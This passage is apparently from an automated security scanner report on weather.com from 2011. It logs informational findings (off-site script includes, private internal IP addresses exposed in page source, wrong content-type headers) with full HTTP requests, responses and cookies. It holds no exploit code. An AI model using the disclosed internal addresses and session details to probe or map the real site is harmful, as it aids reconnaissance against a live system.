<script type="text/javascript" src="http://s.imwx.com/global/common/elements/javascript/a21-2_3.js"></script>


<script type="text/javascript" src="http://d.imwx.com/js/wx-a21-plugthis-2_0.js"></script>
...[SNIP]...

5.8. http://www.weather.com/services/desktop.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /services/desktop.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /services/desktop.html HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; fromStr=hdr_locations; s_pers=%20s_nr%3D1300988111198%7C1303580111198%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/services/desktop.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Date: Thu, 24 Mar 2011 17:37:25 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
SVRNAME: web1x10
Expires: Thu, 24 Mar 2011 17:36:38 GMT
Connection: keep-alive
Content-Length: 96326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Free Desktop Weather and Alerts from The Weather Channel</title>


<meta name="descr
...[SNIP]...
<!-- DFP -->

<script type="text/javascript" src="http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s.imwx.com/v.20110214.1/global/common/elements/javascript/a21-2_3.js"></script>
<script src="http://j.imwx.com/v.20110214.1/common/a21/plugins/a21plugins.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://j.imwx.com/common/header/javascript/eventbroadcaster.js"></script>
...[SNIP]...
</style>
<script type="text/javascript" src="http://s.imwx.com/js/2.8.0r4/yuiloader-dom-event/yuiloader-dom-event.js"></script>
<script type="text/javascript" src="http://j.imwx.com/v.20100826.0/common/header/javascript/wx-header-events.js"></script>
...[SNIP]...

5.9. http://www.weather.com/weather-apps/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /weather-apps/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /weather-apps/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=2; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300987770411%7D; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CUndeclared%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_primary; s_pers=%20s_nr%3D1300987998310%7C1303579998310%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dhomepage%2525253A/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather-apps/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Thu, 24 Mar 2011 17:32:45 GMT
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:37:44 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x00
X-Cache-Hits: 1
X-Varnish: 1096856222 1096828614
Connection: keep-alive
Content-Length: 135009

<!DOCTYPE HTML>

<html lang="en">
<head>


<TITLE>Weather App Index ... A listing of weather apps from weather.com</TITLE>
<META name="Description"
...[SNIP]...
</style>


<script type="text/javascript" src="http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://s.imwx.com/global/common/elements/javascript/a21-2_3.js"></script>


<script type="text/javascript" src="http://d.imwx.com/js/wx-a21-plugthis-2_0.js"></script>
...[SNIP]...

5.10. http://www.weather.com/weather/health/beauty/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /weather/health/beauty/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /weather/health/beauty/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/activities/driving/rushhour/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=3; RMID=c245359a4d8b7f55; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300988045611%7C1303580045611%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/activities/driving/rushhour/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Language: en-US
Content-Type: text/html;charset=ISO-8859-1
Server: Apache
Vary: Accept-Encoding
SVRNAME: web2x11
Date: Thu, 24 Mar 2011 17:33:32 GMT
Connection: keep-alive
Content-Length: 116103


       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">


   <head>
       <meta http-equiv="co
...[SNIP]...
</style>
<script type="text/javascript" src="http://s.imwx.com/js/2.8.0r4/yuiloader-dom-event/yuiloader-dom-event.js"></script>
<script type="text/javascript" src="http://j.imwx.com/v.20100826.0/common/header/javascript/wx-header-events.js"></script>
...[SNIP]...

6. Private IP addresses disclosed
There are 5 instances of this issue:


6.1. http://www.weather.com/activities/driving/rushhour/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /activities/driving/rushhour/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /activities/driving/rushhour/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=2; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300987770411%7D; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CUndeclared%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300987999757%7C1303579999757%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dhomepage%2525253A/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/activities/driving/rushhour/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 17:32:46 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Server: Apache
SVRNAME: web1x10
VarnishSet: web
X-Varnish: 1455522174
Vary: Accept-Encoding
Content-Length: 96659

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<HTML>
<HEAD>
<TITLE>Traffic reports for rush hour traffic conditions and delays from weather.com<
...[SNIP]...
<% /**
       var remoteAddr="172.16.24.21";
       
       var cssSpot = '/v.20101026.1';
       var extdivtoolsVAR = '/v.20101222.3';
       var triggerParamsstdLauncherVAR = '/v.20100929.6';
       var bust_hat='/v.20100727.0';
       var bust_hpCSS='/v.20100304.2';
       
...[SNIP]...
l ads test code
/*
if (adTest)
{
if ((remoteAddr.indexOf("10.") == 0)||
(remoteAddr.indexOf("169.254.") == 0)||
(remoteAddr.indexOf("192.168.") == 0)||
(remoteAddr.indexOf("172.16.24.25") == 0))
{
    OAS_host=adTest;
}
}
*/
OAS_target="_top";OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring(2,11);
...[SNIP]...

6.2. http://www.weather.com/mobile/swap/send_sms_to_phone.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /mobile/swap/send_sms_to_phone.html

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /mobile/swap/send_sms_to_phone.html?from=hdr_locations HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; fromStr=; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%25252523%252526ot%25253DA%3B; s_pers=%20s_nr%3D1300988109827%7C1303580109827%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Date: Thu, 24 Mar 2011 17:37:26 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
SVRNAME: web1x13
Expires: Thu, 24 Mar 2011 17:36:18 GMT
Connection: keep-alive
Content-Length: 34038

<HTML>
   <HEAD>
    <TITLE>Wireless Internet</title>
<script language="JavaScript">var ts_pageid="59201";var ts_pagename="/mobile/swap/send_sms_to_phone.html";var ts_level1="MOBILE";var ts_level2="swap
...[SNIP]...
<% /**
       var remoteAddr="172.16.24.21";
       
       var cssSpot = '/v.20101026.1';
       var extdivtoolsVAR = '/v.20101222.3';
       var triggerParamsstdLauncherVAR = '/v.20100929.6';
       var bust_hat='/v.20100727.0';
       var bust_hpCSS='/v.20100304.2';
       
...[SNIP]...
l ads test code
/*
if (adTest)
{
if ((remoteAddr.indexOf("10.") == 0)||
(remoteAddr.indexOf("169.254.") == 0)||
(remoteAddr.indexOf("192.168.") == 0)||
(remoteAddr.indexOf("172.16.24.25") == 0))
{
    OAS_host=adTest;
}
}
*/
OAS_target="_top";OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring(2,11);
...[SNIP]...

6.3. http://www.weather.com/services/desktop.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /services/desktop.html

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /services/desktop.html HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; fromStr=hdr_locations; s_pers=%20s_nr%3D1300988111198%7C1303580111198%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/services/desktop.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Date: Thu, 24 Mar 2011 17:37:25 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
SVRNAME: web1x10
Expires: Thu, 24 Mar 2011 17:36:38 GMT
Connection: keep-alive
Content-Length: 96326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Free Desktop Weather and Alerts from The Weather Channel</title>


<meta name="descr
...[SNIP]...
<% /**
       var remoteAddr="172.16.24.23";
       
       var cssSpot = '/v.20101026.1';
       var extdivtoolsVAR = '/v.20101222.3';
       var triggerParamsstdLauncherVAR = '/v.20100929.6';
       var bust_hat='/v.20100727.0';
       var bust_hpCSS='/v.20100304.2';
       
...[SNIP]...
l ads test code
/*
if (adTest)
{
if ((remoteAddr.indexOf("10.") == 0)||
(remoteAddr.indexOf("169.254.") == 0)||
(remoteAddr.indexOf("192.168.") == 0)||
(remoteAddr.indexOf("172.16.24.25") == 0))
{
    OAS_host=adTest;
}
}
*/
OAS_target="_top";OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring(2,11);
...[SNIP]...

6.4. http://www.weather.com/weather/health/beauty/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /weather/health/beauty/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /weather/health/beauty/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/activities/driving/rushhour/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=3; RMID=c245359a4d8b7f55; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300988043887%7C1303580043887%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/activities/driving/rushhour/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Language: en-US
Content-Type: text/html;charset=ISO-8859-1
Server: Apache
Vary: Accept-Encoding
SVRNAME: web3x02
Date: Thu, 24 Mar 2011 17:35:19 GMT
Connection: keep-alive
Content-Length: 116103


       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">


   <head>
       <meta http-equiv="co
...[SNIP]...
<script type="text/javascript">
   // Global Cache busting section
       var remoteAddr="172.16.118.30";
       

                   var cssSpot = '/v.20101026.1';
           var extdivtoolsVAR = '/v.20101222.3';
           var triggerParamsstdLauncherVAR = '/v.20100929.6';
           var bust_hat = '/v.20100727.0';
           var bust_globalNav='/v.
...[SNIP]...
cial ads test code
if (adTest)
{
if ((remoteAddr.indexOf("10.") == 0)||
(remoteAddr.indexOf("169.254.") == 0)||
(remoteAddr.indexOf("192.168.") == 0)||
(remoteAddr.indexOf("172.16.24.25") == 0))
{
    OAS_host=adTest;
}
}

OAS_target="_top";OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring(2,11);
f
...[SNIP]...

6.5. http://www.weather.com/weather/health/beauty/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /weather/health/beauty/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /weather/health/beauty/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/activities/driving/rushhour/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=3; RMID=c245359a4d8b7f55; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300988045611%7C1303580045611%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/activities/driving/rushhour/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Language: en-US
Content-Type: text/html;charset=ISO-8859-1
Server: Apache
Vary: Accept-Encoding
SVRNAME: web2x11
Date: Thu, 24 Mar 2011 17:33:32 GMT
Connection: keep-alive
Content-Length: 116103


       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">


   <head>
       <meta http-equiv="co
...[SNIP]...
<script type="text/javascript">
   // Global Cache busting section
       var remoteAddr="172.16.183.25";
       

                   var cssSpot = '/v.20101026.1';
           var extdivtoolsVAR = '/v.20101222.3';
           var triggerParamsstdLauncherVAR = '/v.20100929.6';
           var bust_hat = '/v.20100727.0';
           var bust_globalNav='/v.
...[SNIP]...
cial ads test code
if (adTest)
{
if ((remoteAddr.indexOf("10.") == 0)||
(remoteAddr.indexOf("169.254.") == 0)||
(remoteAddr.indexOf("192.168.") == 0)||
(remoteAddr.indexOf("172.16.24.25") == 0))
{
    OAS_host=adTest;
}
}

OAS_target="_top";OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring(2,11);
f
...[SNIP]...

7. Content type incorrectly stated
There are 2 instances of this issue:


7.1. http://www.weather.com/pagelet/loc/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.weather.com
Path:   /pagelet/loc/

Issue detail

The response contains the following Content-type statement:

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /pagelet/loc/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1300987732569; fv=1

Response

HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 17:28:19 GMT
Expires: Thu, 24 Mar 2011 17:41:53 GMT
Cache-Control: max-age=900
Content-Type: text/html;charset=UTF-8
Server: Apache
SVRNAME: wxii2x02
X-Cache-Hits: 1
X-Varnish: 2184439133 2184417570
X-Varnish-Hashed-On: yahoo
Vary: Accept-Encoding
Content-Length: 1241


    <ul class="twc-weather-locations" id="twc-weather-locations-id">
               
       
                                                                                                                           
...[SNIP]...

7.2. http://www.weather.com/pagelet/metrics/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.weather.com
Path:   /pagelet/metrics/

Issue detail

The response contains the following Content-type statement:

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /pagelet/metrics/?pageID=62287&modeID=default&cb=YAHOO.metrics.createMetrics HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1300987732569; fv=1

Response

HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 17:28:19 GMT
Expires: Thu, 24 Mar 2011 17:33:19 GMT
Cache-Control: max-age=300
